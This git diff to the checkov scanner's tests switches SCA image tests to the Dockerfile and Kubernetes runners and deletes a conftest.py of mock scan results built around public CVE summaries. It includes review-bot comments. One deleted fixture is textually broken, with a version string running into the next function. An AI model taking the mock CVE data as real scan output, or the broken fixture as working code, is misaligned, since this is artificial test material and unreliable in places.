@@ -90,11 +88,11 @@ def test_console_output_in_tty(mocker: MockerFixture, sca_image_report): '\t└──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┘\n', '\n', '\t/path/to/Dockerfile (sha256:123456) - Licenses Statuses:\n', - '\t┌──────────────────────────┬──────────────────────────┬──────────────────────────┬──────────────────────────┬───────────────────────────┐\n', - '\t│ Package name │ Package version │ Policy ID │ License │ Status │\n', - '\t├──────────────────────────┼──────────────────────────┼──────────────────────────┼──────────────────────────┼───────────────────────────┤\n', - '\t│ perl │ 5.34.0-3ubuntu1 │ BC_LIC_1 │ Apache-2.0-Fake │ FAILED │\n', - '\t└──────────────────────────┴──────────────────────────┴──────────────────────────┴──────────────────────────┴───────────────────────────┘\n', + '\t┌────────────────────────────────┬────────────────────────────────┬────────────────────────────────┬────────────────────────────────────┐\n', + "\t│ Package name │ Package version │ Policy ID │ License │\n", + '\t├────────────────────────────────┼────────────────────────────────┼────────────────────────────────┼────────────────────────────────────┤\n', + '\t│ perl │ 5.34.0-3ubuntu1 │ BC_LIC_1 │ Apache-2.0-Fake │\n', + '\t└────────────────────────────────┴────────────────────────────────┴────────────────────────────────┴────────────────────────────────────┘\n', ] ) diff --git a/tests/sca_image/test_runner.py b/tests/sca_image/test_runner.py index 58571d0c493..ade8644e5db 100644 --- a/tests/sca_image/test_runner.py +++ b/tests/sca_image/test_runner.py 
@@ -13,15 +13,13 @@ from checkov.common.bridgecrew.code_categories import CodeCategoryType
 from checkov.common.bridgecrew.severities import Severities, BcSeverities
 from checkov.common.models.enums import CheckResult
-from checkov.github_actions.runner import Runner as GHA_Runner
+from checkov.dockerfile.runner import Runner as Dockerfile_Runner
+from checkov.kubernetes.runner import Runner as Kubernetes_Runner
 from checkov.runner_filter import RunnerFilter
 from checkov.sca_image.runner import Runner
+from .conftest import DOCKERFILE_EXAMPLES_DIR, KUBERNETES_EXAMPLES_DIR
 from .mocks import mock_scan_empty, mock_scan_image
-WORKFLOW_EXAMPLES_DIR = Path(__file__).parent / "examples/.github/workflows"
-WORKFLOW_IMAGE_EXAMPLES_DIR = Path(__file__).parent / "examples/example/.github/workflows"
-DOCKERFILE_EXAMPLES_DIR = Path(__file__).parent / "examples/dockerfile"
-
 def test_image_referencer_trigger_image_flow_calls(mock_bc_integration, image_name, cached_scan_result):
 # given
@@ -59,8 +57,8 @@ def test_image_referencer_trigger_image_flow_calls(mock_bc_integration, image_na
 )
 # when
- reports = GHA_Runner().run(root_folder=str(WORKFLOW_EXAMPLES_DIR),
- runner_filter=RunnerFilter(run_image_referencer=True))
+ reports = Dockerfile_Runner().run(root_folder=str(DOCKERFILE_EXAMPLES_DIR),
+ runner_filter=RunnerFilter(run_image_referencer=True))
 sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE)
@@ -69,9 +67,9 @@ def test_image_referencer_trigger_image_flow_calls(mock_bc_integration, image_na
 assert len(sca_image_report.passed_checks) == 1
-def test_runner_honors_enforcement_rules(mock_bc_integration, image_name, cached_scan_result):
+def test_runner_honors_enforcement_rules(mock_bc_integration, image_name2, cached_scan_result):
 # given
- image_id_encoded = quote_plus(f"image:{image_name}")
+ image_id_encoded = quote_plus(f"image:{image_name2}")
 response_json = {
 "violations": [
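Review bot: `from .conftest import DOCKERFILE_EXAMPLES_DIR, KUBERNETES_EXAMPLES_DIR` imports a conftest module directly, which pytest discourages because conftest files are loaded as plugins and importing them can register the module twice under different names; the two constants belong in a plain sibling module (or the test module can build them itself, as it did before this hunk). With the three `Path(__file__)` constants deleted, the `from pathlib import Path` import above this hunk looks unused unless `Path` is referenced further down the file — worth checking, as the first hunk starts just below the import block. The same runner swap is repeated in the later hunks of this file and needs no separate comment.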
@@ -109,14 +107,14 @@ def test_runner_honors_enforcement_rules(mock_bc_integration, image_name, cached
 # this is not quite a true test, because the checks don't have severities. However, this shows that the check registry
 # passes the report type properly to RunnerFilter.should_run_check, and we have tests for that method
 runner_filter.enforcement_rule_configs = {
- CheckType.GITHUB_ACTIONS: Severities[BcSeverities.OFF],
+ CheckType.KUBERNETES: Severities[BcSeverities.OFF],
 CheckType.SCA_IMAGE: {
 CodeCategoryType.LICENSES: Severities[BcSeverities.OFF],
 CodeCategoryType.VULNERABILITIES: Severities[BcSeverities.OFF]
 }
 }
- reports = GHA_Runner().run(root_folder=str(WORKFLOW_EXAMPLES_DIR), runner_filter=runner_filter)
+ reports = Kubernetes_Runner().run(root_folder=str(KUBERNETES_EXAMPLES_DIR), runner_filter=runner_filter)
 sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE)
 summary = sca_image_report.get_summary()
@@ -236,7 +234,7 @@ def test_run_license_policy(mock_bc_integration, image_name, cached_scan_result)
 # when
 runner_filter = RunnerFilter(checks=['BC_LIC_1'], run_image_referencer=True)
- reports = GHA_Runner().run(root_folder=str(WORKFLOW_EXAMPLES_DIR), runner_filter=runner_filter)
+ reports = Dockerfile_Runner().run(root_folder=str(DOCKERFILE_EXAMPLES_DIR), runner_filter=runner_filter)
 sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE)
 # then
 assert not [c for c in sca_image_report.passed_checks + sca_image_report.failed_checks
@@ -292,8 +290,8 @@ def test_run_with_empty_scan_result(mock_bc_integration):
 @mock.patch.dict(os.environ, {"CKV_IGNORE_HIDDEN_DIRECTORIES": "false"})
 @mock.patch('checkov.sca_image.runner.Runner.get_image_cached_results', mock_scan_image)
-def test_run_with_image_cached_reports_env(mock_bc_integration, image_name2, cached_scan_result2):
- image_id_encoded = quote_plus(f"image:{image_name2}")
+def test_run_with_image_cached_reports_env(mock_bc_integration, image_name, cached_scan_result2):
+ image_id_encoded = quote_plus(f"image:{image_name}")
 with aioresponses() as mock_response:
 mock_response.get(
@@ -303,7 +301,7 @@ def test_run_with_image_cached_reports_env(mock_bc_integration, image_name2, cac
 )
 runner_filter = RunnerFilter(run_image_referencer=True)
- reports = GHA_Runner().run(root_folder=str(WORKFLOW_IMAGE_EXAMPLES_DIR), runner_filter=runner_filter)
+ reports = Dockerfile_Runner().run(root_folder=str(DOCKERFILE_EXAMPLES_DIR), runner_filter=runner_filter)
 sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE)
 assert len(sca_image_report.passed_checks) == 0
@@ -316,9 +314,9 @@ def test_run_with_image_cached_reports_env(mock_bc_integration, image_name2, cac
 @mock.patch.dict(os.environ, {"CHECKOV_CREATE_SCA_IMAGE_REPORTS_FOR_IR": "False"})
 @mock.patch.dict(os.environ, {"CKV_IGNORE_HIDDEN_DIRECTORIES": "false"})
 @mock.patch('checkov.sca_image.runner.Runner.get_image_cached_results', mock_scan_image)
-def test_run_with_image_cached_reports_and_without_sca_reports_env(mock_bc_integration, image_name2,
+def test_run_with_image_cached_reports_and_without_sca_reports_env(mock_bc_integration, image_name,
 cached_scan_result2):
- image_id_encoded = quote_plus(f"image:{image_name2}")
+ image_id_encoded = quote_plus(f"image:{image_name}")
 with aioresponses() as mock_response:
 mock_response.get(
 url=URL(mock_bc_integration.api_url + f"/api/v1/vulnerabilities/scan-results/{image_id_encoded}", encoded=True),
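Review bot: test_run_with_image_cached_reports_env and test_run_with_image_cached_reports_and_without_sca_reports_env now pair `image_name` with `cached_scan_result2`, while test_runner_honors_enforcement_rules (earlier hunk) was switched the other way to pair `image_name2` with `cached_scan_result`; if each cached result fixture describes one image, the crossed pairing looks accidental rather than intended, and nothing in the hunk says which example manifest references which image. Either rename the fixtures after the image they describe or add a short comment at each swapped call, e.g. `# examples/dockerfile references the image returned by image_name`, so the pairing can be checked without opening conftest. The decorated functions continue past the hunk.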
@@ -327,7 +325,7 @@ def test_run_with_image_cached_reports_and_without_sca_reports_env(mock_bc_integ
 )
 runner_filter = RunnerFilter(run_image_referencer=True)
- reports = GHA_Runner().run(root_folder=str(WORKFLOW_IMAGE_EXAMPLES_DIR), runner_filter=runner_filter)
+ reports = Dockerfile_Runner().run(root_folder=str(DOCKERFILE_EXAMPLES_DIR), runner_filter=runner_filter)
 sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE)
 assert len(sca_image_report.passed_checks) == 0
diff --git a/tests/sca_package/__init__.py b/tests/sca_package/__init__.py
deleted file mode 100644
index e69de29bb2d..00000000000
diff --git a/tests/sca_package/conftest.py b/tests/sca_package/conftest.py
deleted file mode 100644
index 1b25775626e..00000000000
--- a/tests/sca_package/conftest.py
+++ /dev/null
@@ -1,915 +0,0 @@ -import os -from pathlib import Path -from unittest import mock -from unittest.mock import MagicMock - -from typing import Dict, Any, List -from pytest_mock import MockerFixture - -import pytest - -from checkov.common.bridgecrew.bc_source import SourceType -from checkov.common.bridgecrew.platform_integration import BcPlatformIntegration, bc_integration -from checkov.common.output.report import Report -from checkov.sca_package.runner import Runner -from checkov.runner_filter import RunnerFilter - -EXAMPLES_DIR = Path(__file__).parent / "examples" - -@pytest.fixture(autouse=True) -def mock_env_vars(): - with mock.patch.dict(os.environ, {"CHECKOV_RUN_SCA_PACKAGE_SCAN_V2": "false"}): - yield - - -@pytest.fixture() -def mock_bc_integration() -> BcPlatformIntegration: - bc_integration.bc_api_key = "abcd1234-abcd-1234-abcd-1234abcd1234" - bc_integration.setup_bridgecrew_credentials( - repo_id="bridgecrewio/checkov", - skip_fixes=True, - skip_download=True, - source=SourceType("Github", False), - source_version="1.0", - repo_branch="master", - ) - return bc_integration - - -@pytest.fixture() -def scan_result2() -> Dict[str, Any]: - return { - "repository": "/tmp/results/requirements.txt", - "passed": True, - "packages": [ - { - "type": "python", - "name": "django", - "version": "1.2", - "path": "/tmp/results/requirements.txt" - }, - { - "type": "python", - "name": "flask", - "version": "0.6", - "path": "/tmp/results/requirements.txt" - }, - { - "type": "python", - "name": "requests", - "version": "2.26.0", - "path": "/tmp/results/requirements.txt" - } - ], - "complianceIssues": None, - "complianceDistribution": { - "critical": 0, - "high": 0, - "medium": 0, - "low": 0, - "total": 0 - }, - "vulnerabilities": [ - { - "id": "CVE-2016-6186", - "status": "fixed in 1.9.8, 1.8.14", - "cvss": 6.1, - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", - "description": "Cross-site scripting (XSS) vulnerability in the dismissChangeRelatedObjectPopup function 
in contrib/admin/static/admin/js/admin/RelatedObjectLookups.js in Django before 1.8.14, 1.9.x before 1.9.8, and 1.10.x before 1.10rc1 allows remote attackers to inject arbitrary web script or HTML via vectors involving unsafe usage of Element.innerHTML.", - "severity": "medium", - "packageName": "django", - "packageVersion": "1.2", - "link": "https://nvd.nist.gov/vuln/detail/CVE-2016-6186", - "riskFactors": [ - "Attack complexity: low", - "Attack vector: network", - "Exploit exists", - "Has fix", - "Medium severity" - ], - "impactedVersions": [ - "<=1.8.13" - ], - "publishedDate": "2016-08-05T15:59:00Z", - "discoveredDate": "2016-08-05T15:59:00Z", - "fixDate": "2016-08-05T15:59:00Z" - }, - { - "id": "CVE-2016-7401", - "status": "fixed in 1.9.10, 1.8.15", - "cvss": 7.5, - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "description": "The cookie parsing code in Django before 1.8.15 and 1.9.x before 1.9.10, when used on a site with Google Analytics, allows remote attackers to bypass an intended CSRF protection mechanism by setting arbitrary cookies.", - "severity": "high", - "packageName": "django", - "packageVersion": "1.2", - "link": "https://nvd.nist.gov/vuln/detail/CVE-2016-7401", - "riskFactors": [ - "Attack complexity: low", - "Attack vector: network", - "Has fix", - "High severity" - ], - "impactedVersions": [ - "<=1.8.14" - ], - "publishedDate": "2016-10-03T18:59:00Z", - "discoveredDate": "2016-10-03T18:59:00Z", - "fixDate": "2016-10-03T18:59:00Z" - }, - { - "id": "CVE-2019-19844", - "status": "fixed in 3.0.1, 2.2.9, 1.11.27", - "cvss": 9.8, - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "description": "Django before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. A suitably crafted email address (that is equal to an existing user\\\\\\'s email address after case transformation of Unicode characters) would allow an attacker to be sent a password reset token for the matched user account. 
(One mitigation in the new releases is to send password reset tokens only to the registered user email address.)", - "severity": "critical", - "packageName": "django", - "packageVersion": "1.2", - "link": "https://nvd.nist.gov/vuln/detail/CVE-2019-19844", - "riskFactors": [ - "Attack complexity: low", - "Attack vector: network", - "Critical severity", - "Has fix" - ], - "impactedVersions": [ - "<1.11.27" - ], - "publishedDate": "2019-12-18T19:15:00Z", - "discoveredDate": "2019-12-18T19:15:00Z", - "fixDate": "2019-12-18T19:15:00Z" - }, - { - "id": "CVE-2021-33203", - "status": "fixed in 3.2.4, 3.1.12, 2.2.24", - "cvss": 4.9, - "vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", - "description": "Django before 2.2.24, 3.x before 3.1.12, and 3.2.x before 3.2.4 has a potential directory traversal via django.contrib.admindocs. Staff members could use the TemplateDetailView view to check the existence of arbitrary files. Additionally, if (and only if) the default admindocs templates have been customized by application developers to also show file contents, then not only the existence but also the file contents would have been exposed. 
In other words, there is directory traversal outside of the template root directories.", - "severity": "medium", - "packageName": "django", - "packageVersion": "1.2", - "link": "https://nvd.nist.gov/vuln/detail/CVE-2021-33203", - "riskFactors": [ - "Has fix", - "Medium severity", - "Recent vulnerability", - "Attack complexity: low", - "Attack vector: network" - ], - "impactedVersions": [ - "<2.2.24" - ], - "publishedDate": "2021-06-08T18:15:00Z", - "discoveredDate": "2021-06-08T18:15:00Z", - "fixDate": "2021-06-08T18:15:00Z" - }, - { - "id": "CVE-2018-1000656", - "status": "fixed in 0.12.3", - "cvss": 7.5, - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "description": "The Pallets Project flask version Before 0.12.3 contains a CWE-20: Improper Input Validation vulnerability in flask that can result in Large amount of memory usage possibly leading to denial of service. This attack appear to be exploitable via Attacker provides JSON data in incorrect encoding. This vulnerability appears to have been fixed in 0.12.3. NOTE: this may overlap CVE-2019-1010083.", - "severity": "high", - "packageName": "flask", - "packageVersion": "0.6", - "link": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000656", - "riskFactors": [ - "Attack complexity: low", - "Attack vector: network", - "DoS", - "Has fix", - "High severity" - ], - "impactedVersions": [ - "<0.12.3" - ], - "publishedDate": "2018-08-20T19:31:00Z", - "discoveredDate": "2018-08-20T19:31:00Z", - "fixDate": "2018-08-20T19:31:00Z" - }, - { - "id": "CVE-2019-1010083", - "status": "fixed in 1.0", - "cvss": 7.5, - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "description": "The Pallets Project Flask before 1.0 is affected by: unexpected memory usage. The impact is: denial of service. The attack vector is: crafted encoded JSON data. The fixed version is: 1. 
NOTE: this may overlap CVE-2018-1000656.", - "severity": "high", - "packageName": "flask", - "packageVersion": "0.6", - "link": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010083", - "riskFactors": [ - "Has fix", - "High severity", - "Attack complexity: low", - "Attack vector: network", - "DoS" - ], - "impactedVersions": [ - "<1.0" - ], - "publishedDate": "2019-07-17T14:15:00Z", - "discoveredDate": "2019-07-17T14:15:00Z", - "fixDate": "2019-07-17T14:15:00Z" - } - ], - "vulnerabilityDistribution": { - "critical": 1, - "high": 3, - "medium": 2, - "low": 0, - "total": 6 - } - } - - -@pytest.fixture(scope='package') -def scan_result() -> List[Dict[str, Any]]: - return [ - { - "repository": "/path/to/requirements.txt", - "passed": True, - "packages": [ - { - "type": "python", - "name": "requests", - "version": "2.26.0", - "path": "/path/to/requirements.txt", - }, - { - "type": "python", - "name": "django", - "version": "1.2", - "path": "/path/to/requirements.txt", - }, - { - "type": "python", - "name": "flask", - "version": "0.6", - "path": "/path/to/requirements.txt", - }, - ], - "complianceIssues": None, - "complianceDistribution": {"critical": 0, "high": 0, "medium": 0, "low": 0, "total": 0}, - "vulnerabilities": [ - { - "id": "CVE-2019-19844", - "status": "fixed in 3.0.1, 2.2.9, 1.11.27", - "cvss": 9.8, - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "description": "Django before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. A suitably crafted email address (that is equal to an existing user\\'s email address after case transformation of Unicode characters) would allow an attacker to be sent a password reset token for the matched user account. 
(One mitigation in the new releases is to send password reset tokens only to the registered user email address.)", - "severity": "critical", - "packageName": "django", - "packageVersion": "1.2", - "link": "https://nvd.nist.gov/vuln/detail/CVE-2019-19844", - "riskFactors": {"Attack complexity: low": {}, "Attack vector: network": {}, "Critical severity": {}, "Has fix": {}}, - "riskFactorsV2": { - "Severity": "Critical", - "HasFix": True, - "DoS": False, - "AttackVector": "network", - "AttackComplexity": "low" - }, - "impactedVersions": ["<1.11.27"], - "publishedDate": "2019-12-18T20:15:00+01:00", - "discoveredDate": "2019-12-18T19:15:00Z", - "fixDate": "2019-12-18T20:15:00+01:00", - }, - { - "id": "CVE-2016-6186", - "status": "fixed in 1.9.8, 1.8.14", - "cvss": 6.1, - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", - "description": "Cross-site scripting (XSS) vulnerability in the dismissChangeRelatedObjectPopup function in contrib/admin/static/admin/js/admin/RelatedObjectLookups.js in Django before 1.8.14, 1.9.x before 1.9.8, and 1.10.x before 1.10rc1 allows remote attackers to inject arbitrary web script or HTML via vectors involving unsafe usage of Element.innerHTML.", - "severity": "medium", - "packageName": "django", - "packageVersion": "1.2", - "link": "https://nvd.nist.gov/vuln/detail/CVE-2016-6186", - "riskFactors": { - "Attack complexity: low": {}, - "Attack vector: network": {}, - "Medium severity": {}, - "Has fix": {}, - "Exploit exists": {}}, - "riskFactorsV2": { - "Severity": "Medium", - "HasFix": True, - "DoS": False, - "AttackVector": "network", - "AttackComplexity": "low", - "Exploit exists": True - }, - "impactedVersions": ["<=1.8.13"], - "publishedDate": "2016-08-05T17:59:00+02:00", - "discoveredDate": "2016-08-05T15:59:00Z", - "fixDate": "2016-08-05T17:59:00+02:00", - }, - { - "id": "CVE-2016-7401", - "status": "fixed in 1.9.10, 1.8.15", - "cvss": 7.5, - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "description": "The cookie 
parsing code in Django before 1.8.15 and 1.9.x before 1.9.10, when used on a site with Google Analytics, allows remote attackers to bypass an intended CSRF protection mechanism by setting arbitrary cookies.", - "severity": "high", - "packageName": "django", - "packageVersion": "1.2", - "link": "https://nvd.nist.gov/vuln/detail/CVE-2016-7401", - "riskFactors": {"Attack complexity: low": {}, "Attack vector: network": {}, "High severity": {}, "Has fix": {}}, - "riskFactorsV2": { - "Severity": "High", - "HasFix": True, - "DoS": False, - "AttackVector": "network", - "AttackComplexity": "low" - }, - "impactedVersions": ["<=1.8.14"], - "publishedDate": "2016-10-03T20:59:00+02:00", - "discoveredDate": "2016-10-03T18:59:00Z", - "fixDate": "2016-10-03T20:59:00+02:00", - }, - { - "id": "CVE-2021-33203", - "status": "fixed in 3.2.4, 3.1.12, 2.2.24", - "cvss": 4.9, - "vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", - "description": "Django before 2.2.24, 3.x before 3.1.12, and 3.2.x before 3.2.4 has a potential directory traversal via django.contrib.admindocs. Staff members could use the TemplateDetailView view to check the existence of arbitrary files. Additionally, if (and only if) the default admindocs templates have been customized by application developers to also show file contents, then not only the existence but also the file contents would have been exposed. 
In other words, there is directory traversal outside of the template root directories.", - "severity": "medium", - "packageName": "django", - "packageVersion": "1.2", - "link": "https://nvd.nist.gov/vuln/detail/CVE-2021-33203", - "riskFactors": {"Attack complexity: low": {}, "Attack vector: network": {}, "High severity": {}, "Has fix": {}}, - "riskFactorsV2": { - "Severity": "High", - "HasFix": True, - "DoS": False, - "AttackVector": "network", - "AttackComplexity": "low" - }, - "impactedVersions": ["<2.2.24"], - "publishedDate": "2021-06-08T20:15:00+02:00", - "discoveredDate": "2021-06-08T18:15:00Z", - "fixDate": "2021-06-08T20:15:00+02:00", - }, - { - "id": "CVE-2019-1010083", - "status": "fixed in 1.0", - "cvss": 7.5, - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "description": "The Pallets Project Flask before 1.0 is affected by: unexpected memory usage. The impact is: denial of service. The attack vector is: crafted encoded JSON data. The fixed version is: 1. NOTE: this may overlap CVE-2018-1000656.", - "severity": "high", - "packageName": "flask", - "packageVersion": "0.6", - "link": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010083", - "riskFactors": {"Attack complexity: low": {}, "Attack vector: network": {}, "High severity": {}, - "Has fix": {}, "Dos": {}}, - "riskFactorsV2": { - "Severity": "High", - "HasFix": True, - "DoS": True, - "AttackVector": "network", - "AttackComplexity": "low" - }, - "impactedVersions": ["<1.0"], - "publishedDate": "2019-07-17T16:15:00+02:00", - "discoveredDate": "2019-07-17T14:15:00Z", - "fixDate": "2019-07-17T16:15:00+02:00", - }, - { - "id": "CVE-2018-1000656", - "status": "fixed in 0.12.3", - "cvss": 7.5, - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "description": "The Pallets Project flask version Before 0.12.3 contains a CWE-20: Improper Input Validation vulnerability in flask that can result in Large amount of memory usage possibly leading to denial of service. 
This attack appear to be exploitable via Attacker provides JSON data in incorrect encoding. This vulnerability appears to have been fixed in 0.12.3. NOTE: this may overlap CVE-2019-1010083.", - "severity": "high", - "packageName": "flask", - "packageVersion": "0.6", - "link": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000656", - "riskFactors": {"Attack complexity: low": {}, "Attack vector: network": {}, "High severity": {}, - "Has fix": {}, "Dos": {}}, - "riskFactorsV2": { - "Severity": "High", - "HasFix": True, - "DoS": True, - "AttackVector": "network", - "AttackComplexity": "low" - }, - "impactedVersions": ["<0.12.3"], - "publishedDate": "2018-08-20T21:31:00+02:00", - "discoveredDate": "2018-08-20T19:31:00Z", - "fixDate": "2018-08-20T21:31:00+02:00", - }, - ], - "vulnerabilityDistribution": {"critical": 1, "high": 3, "medium": 2, "low": 0, "total": 6}, - "license_statuses": [ - { - "packageName": "django", - "packageVersion": "1.2", - "packageLang": "python", - "license": "OSI_BDS", - "status": "COMPLIANT", - "policy": "BC_LIC_1" - }, - { - "packageName": "flask", - "packageVersion": "0.6", - "packageLang": "python", - "license": "OSI_APACHE", - "status": "COMPLIANT", - "policy": "BC_LIC_1" - }, - { - "packageName": "flask", - "packageVersion": "0.6", - "packageLang": "python", - "license": "DUMMY_OTHER_LICENSE", # not a real license. 
it is just for test a package with 2 licenses - "status": "OPEN", - "policy": "BC_LIC_1" - }, - { - "packageName": "requests", - "packageVersion": "2.26.0", - "packageLang": "python", - "license": "OSI_APACHE", - "status": "COMPLIANT", - "policy": "BC_LIC_1" - } - ], - }, - { - "repository": "/path/to/sub/requirements.txt", - "passed": True, - "packages": [ - { - "type": "python", - "name": "requests", - "version": "2.26.0", - "path": "/path/to/sub/requirements.txt", - } - ], - "complianceIssues": None, - "complianceDistribution": {"critical": 0, "high": 0, "medium": 0, "low": 0, "total": 0}, - "vulnerabilities": None, - "vulnerabilityDistribution": {"critical": 0, "high": 0, "medium": 0, "low": 0, "total": 0}, - "license_statuses": [ - { - "packageName": "requests", - "packageVersion": "2.26.0", - "packageLang": "python", - "license": "OSI_APACHE", - "status": "COMPLIANT", - "policy": "BC_LIC_1" - } - ], - }, - { - "repository": "/path/to/go.sum", - "passed": True, - "packages": [ - { - "type": "go", - "name": "github.com/miekg/dns", - "version": "v1.1.41", - "path": "/path/to/go.sum", - }, - { - "type": "go", - "name": "golang.org/x/crypto", - "version": "v0.0.1", - "path": "/path/to/go.sum", - }, - { - "type": "go", - "name": "github.com/dgrijalva/jwt-go", - "version": "v3.2.0", - "path": "/path/to/go.sum", - }, - { - "type": "go", - "name": "github.com/prometheus/client_model", - "version": "v0.0.0-20190129233127-fd36f4220a90", - "path": "/path/to/go.sum", - } - ], - "complianceIssues": None, - "complianceDistribution": {"critical": 0, "high": 0, "medium": 0, "low": 0, "total": 0}, - "vulnerabilities": [ - { - "id": "CVE-2020-29652", - "status": "fixed in v0.0.2", - "cvss": 7.5, - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "description": "A nil pointer dereference in the golang.org/x/crypto/ssh component through v0.0.3 for Go allows remote attackers to cause a denial of service against SSH servers.", - "severity": "high", - "packageName": 
"golang.org/x/crypto", - "packageVersion": "v0.0.1", - "link": "https://nvd.nist.gov/vuln/detail/CVE-2020-29652", - "riskFactors": {"Attack complexity: low": {}, "Attack vector: network": {}, "High severity": {}, - "Has fix": {}, "Dos": {}}, - "riskFactorsV2": { - "Severity": "High", - "HasFix": True, - "DoS": True, - "AttackVector": "network", - "AttackComplexity": "low" - }, - "impactedVersions": [" List[Dict[str, Any]]: - return [ - { - "repository": "/path/to/requirements.txt", - "passed": True, - "packages": [ - { - "type": "python", - "name": "requests", - "version": "2.26.0", - "path": "/path/to/requirements.txt", - }, - { - "type": "python", - "name": "django", - "version": "1.2", - "path": "/path/to/requirements.txt", - }, - { - "type": "python", - "name": "flask", - "version": "0.6", - "path": "/path/to/requirements.txt", - }, - ], - "complianceIssues": None, - "complianceDistribution": {"critical": 0, "high": 0, "medium": 0, "low": 0, "total": 0}, - "vulnerabilities": [ - { - "id": "CVE-2019-19844", - "status": "fixed in 3.0.1, 2.2.9, 1.11.27", - "cvss": 9.8, - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "description": "Django before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. A suitably crafted email address (that is equal to an existing user\\'s email address after case transformation of Unicode characters) would allow an attacker to be sent a password reset token for the matched user account. 
(One mitigation in the new releases is to send password reset tokens only to the registered user email address.)", - "severity": "critical", - "packageName": "django", - "packageVersion": "1.2", - "link": "https://nvd.nist.gov/vuln/detail/CVE-2019-19844", - "riskFactors": ["Attack complexity: low", "Attack vector: network", "Critical severity", "Has fix"], - "impactedVersions": ["<1.11.27"], - "publishedDate": "2019-12-18T20:15:00+01:00", - "discoveredDate": "2019-12-18T19:15:00Z", - "fixDate": "2019-12-18T20:15:00+01:00", - }, - { - "id": "CVE-2016-6186", - "status": "fixed in 1.9.8, 1.8.14", - "cvss": 6.1, - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", - "description": "Cross-site scripting (XSS) vulnerability in the dismissChangeRelatedObjectPopup function in contrib/admin/static/admin/js/admin/RelatedObjectLookups.js in Django before 1.8.14, 1.9.x before 1.9.8, and 1.10.x before 1.10rc1 allows remote attackers to inject arbitrary web script or HTML via vectors involving unsafe usage of Element.innerHTML.", - "severity": "medium", - "packageName": "django", - "packageVersion": "1.2", - "link": "https://nvd.nist.gov/vuln/detail/CVE-2016-6186", - "riskFactors": [ - "Attack complexity: low", - "Attack vector: network", - "Exploit exists", - "Has fix", - "Medium severity", - ], - "impactedVersions": ["<=1.8.13"], - "publishedDate": "2016-08-05T17:59:00+02:00", - "discoveredDate": "2016-08-05T15:59:00Z", - "fixDate": "2016-08-05T17:59:00+02:00", - }, - { - "id": "CVE-2016-7401", - "status": "fixed in 1.9.10, 1.8.15", - "cvss": 7.5, - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "description": "The cookie parsing code in Django before 1.8.15 and 1.9.x before 1.9.10, when used on a site with Google Analytics, allows remote attackers to bypass an intended CSRF protection mechanism by setting arbitrary cookies.", - "severity": "high", - "packageName": "django", - "packageVersion": "1.2", - "link": 
"https://nvd.nist.gov/vuln/detail/CVE-2016-7401", - "riskFactors": ["High severity", "Attack complexity: low", "Attack vector: network", "Has fix"], - "impactedVersions": ["<=1.8.14"], - "publishedDate": "2016-10-03T20:59:00+02:00", - "discoveredDate": "2016-10-03T18:59:00Z", - "fixDate": "2016-10-03T20:59:00+02:00", - }, - { - "id": "CVE-2021-33203", - "status": "fixed in 3.2.4, 3.1.12, 2.2.24", - "cvss": 4.9, - "vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", - "description": "Django before 2.2.24, 3.x before 3.1.12, and 3.2.x before 3.2.4 has a potential directory traversal via django.contrib.admindocs. Staff members could use the TemplateDetailView view to check the existence of arbitrary files. Additionally, if (and only if) the default admindocs templates have been customized by application developers to also show file contents, then not only the existence but also the file contents would have been exposed. In other words, there is directory traversal outside of the template root directories.", - "severity": "medium", - "packageName": "django", - "packageVersion": "1.2", - "link": "https://nvd.nist.gov/vuln/detail/CVE-2021-33203", - "riskFactors": [ - "Attack complexity: low", - "Attack vector: network", - "Has fix", - "Medium severity", - "Recent vulnerability", - ], - "impactedVersions": ["<2.2.24"], - "publishedDate": "2021-06-08T20:15:00+02:00", - "discoveredDate": "2021-06-08T18:15:00Z", - "fixDate": "2021-06-08T20:15:00+02:00", - }, - { - "id": "CVE-2019-1010083", - "status": "fixed in 1.0", - "cvss": 7.5, - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "description": "The Pallets Project Flask before 1.0 is affected by: unexpected memory usage. The impact is: denial of service. The attack vector is: crafted encoded JSON data. The fixed version is: 1. 
